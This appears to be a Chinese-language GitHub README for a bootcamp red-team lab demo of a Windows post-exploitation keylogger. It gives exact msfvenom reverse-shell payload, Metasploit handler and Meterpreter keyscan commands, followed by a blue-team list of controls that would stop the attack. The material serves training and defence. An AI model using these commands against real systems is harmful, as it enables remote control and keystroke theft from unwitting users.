bjhalladay/keylogger-meterpreter-demo
GitHub: bjhalladay/keylogger-meterpreter-demo
一个展示Windows平台后渗透键盘记录攻击完整流程的红队演示项目,包含配套的蓝队防御指南。
Stars: 0 | Forks: 0
# 后期利用键盘记录器演示 – Meterpreter + Metasploit
**场景:** 演示从初始载荷生成到按键捕获的后期利用键盘记录技术。
**环境:** 隔离的 VirtualBox 实验室(Kali Linux 攻击者 + Windows 目标)
**角色:** 红队演示人员
**背景:** BootCon 演示项目 — 网络安全训练营结业演示
## 概述
本项目演示了在 Windows 主机上部署键盘记录器的完整攻击者工作流程(作为后期利用活动)。我使用 `msfvenom` 生成了 Windows 反向 shell 载荷,通过 Python HTTP 服务器传递,在 `msfconsole` 中处理回调,迁移到用户进程,并使用 Meterpreter 内置的 `keyscan` 模块捕获按键。
演示的目的是展示攻击者如何快速从"我获得了 RCE"转变为"我正在捕获这台机器上的每一个按键",以及为什么端点保护、应用程序白名单和出口过滤至关重要。
## 工具与技能
- **载荷生成:** `msfvenom`
- **载荷传递:** Python `http.server`
- **命令与控制:** Metasploit Framework (`msfconsole`)、`multi/handler`
- **后期利用:** Meterpreter — 进程迁移、键盘记录(`keyscan_start`、`keyscan_dump`)
- **实验室基础设施:** VirtualBox、主机专用网络
## 流程
1. **在 Kali 上生成载荷:**
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.2 LPORT=4444 -f exe -o shell.exe
```
2. **通过快速 HTTP 服务器托管载荷:**
```
python3 -m http.server 8000
```
3. **在 Windows 目标虚拟机上传输并执行**(通过浏览 Kali 的 IP,实验室中为演示目的关闭了 Defender)。
4. **在 `msfconsole` 中启动监听器:**
```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.2
set LPORT 4444
exploit
```
5. **捕获会话**并迁移到长寿用户进程以保持稳定性。
6. **启动键盘记录器:**
```
keyscan_start
```
7. **转储捕获的按键:**
```
keyscan_dump
```
8. **清理** — 停止键盘记录器并关闭会话。
## 防御要点(演示的真正目的)
攻击之所以能够成功,是因为实验室环境中的防御措施被放宽了。在真实环境中,以下控制措施会打破这一攻击链:
- **端点保护**会标记 `msfvenom` 生成的二进制文件(已知签名)
- **应用程序白名单 / AppLocker / WDAC**会阻止 `Downloads` 中的未签名可执行文件
- **出口过滤**会阻止 outbound TCP/4444 回调到攻击者的 IP
- **进程完整性监控(Sysmon)**会记录可疑的进程迁移和父子进程链
- **用户安全意识** — 用户仍然需要下载并运行该文件
## 交付物
- 🎬 **[BootCon 演示文稿](./deliverables/BootCon_Keylogger_Presentation.pptx)** — 演示文稿幻灯片
- 📜 **[演示脚本](./deliverables/demo-script.md)** — 带精确命令的带旁白演示
- 🛡️ **[检测与缓解说明](./deliverables/defenses.md)** — 本可以阻止此攻击的蓝队控制措施
## 简历亮点
在隔离的实验室中使用 `msfvenom`、Metasploit 和 Meterpreter 构建并演示了真实的后期利用攻击,涵盖载荷生成、传递、C2、进程迁移和键盘记录,并提供了匹配的防御控制建议(EDR、应用程序白名单、出口过滤)。
*在隔离的 VirtualBox 实验室环境中演示。请勿在任何您不拥有或没有书面授权测试的系统上运行此操作。*
标签:Conpot, CTO, DAST, HTTP工具, Meterpreter, msfvenom, PE 加载器, Python HTTP服务, RCE, TGT, VirtualBox, Web报告查看器, Windows安全, 反向shell, 嗅探欺骗, 实验室环境, 恶意软件分析, 攻防演练, 数据展示, 无线安全, 权限维持, 红队, 终端安全, 网络安全, 网络安全审计, 进程迁移, 逆向工具, 键盘记录, 隐私保护